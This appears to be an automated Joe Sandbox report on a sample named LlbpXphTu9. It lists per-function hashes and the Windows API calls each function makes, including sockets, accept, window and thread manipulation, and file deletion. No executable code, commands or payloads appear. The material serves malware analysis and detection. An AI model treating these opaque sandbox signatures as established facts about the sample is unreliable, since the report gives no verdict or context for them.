                                                                                                                                                                            • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                                                                                                            • Opcode Fuzzy Hash: c8a8680659340ce3ae7b61d15611f915275d61821cdaab737acf418eefb31e18
                                                                                                                                                                            • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • __flush.LIBCMT ref: 00414630
                                                                                                                                                                            • __fileno.LIBCMT ref: 00414650
                                                                                                                                                                            • __locking.LIBCMT ref: 00414657
                                                                                                                                                                            • __flsbuf.LIBCMT ref: 00414682
                                                                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3240763771-0
                                                                                                                                                                            • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                                                            • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                                                                                                            • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                                                                                                            • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                            • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                            • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CopyVariant$ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2286883814-0
                                                                                                                                                                            • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                                                                            • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                                                                                                            • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                                                                                                            • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                                                                                                            APIs
                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                                                                                                            • #21.WSOCK32 ref: 004740E0
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$socket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1881357543-0
                                                                                                                                                                            • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                                                                            • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                                                                                                            • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                                                                                                            • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                                                                                                                            APIs
                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                                                                            • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1352109105-0
                                                                                                                                                                            • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                                                                            • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                                                                                                                            • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                                                                                                            • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                                                                                                                            APIs
                                                                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                                                                                                                            • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3058430110-0
                                                                                                                                                                            • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                                                                            • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                                                                                                                            • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                                                                            • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                                                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                                                            • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                                                                            • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                                                                                                            • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                                                                            • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetParent.USER32(?), ref: 004505BF
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Proc$Parent
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2351499541-0
                                                                                                                                                                            • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                                                                            • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                                                                                                            • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                                                                                                                            • __itow.LIBCMT ref: 00461461
                                                                                                                                                                            • __itow.LIBCMT ref: 004614AB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$__itow$_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2875217250-0
                                                                                                                                                                            • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                                                                            • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                                                                                                                            • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                                                                            • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00472806
                                                                                                                                                                              • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                                                                                                              • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                                                                                                              • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 0047281A
                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 0047285C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                                                            • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                                                                            • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                                                                                                                            • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                                                                            • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2169480361-0
                                                                                                                                                                            • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                                                            • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                                                                                                            • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                                                            • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32 ref: 00448CB8
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                                                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                                                                                                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                            • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                                                                            • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                                                                                                            • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                                                                            • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                                                                                                            APIs
                                                                                                                                                                            • select.WSOCK32 ref: 0045890A
                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                                                                                                            • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLastacceptselect
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 385091864-0
                                                                                                                                                                            • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                                                                            • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                                                                                                            • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                                                                            • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                                                                            • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                                                                                                            • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                                                                            • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1358664141-0
                                                                                                                                                                            • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                                                                            • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                                                                                                            • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
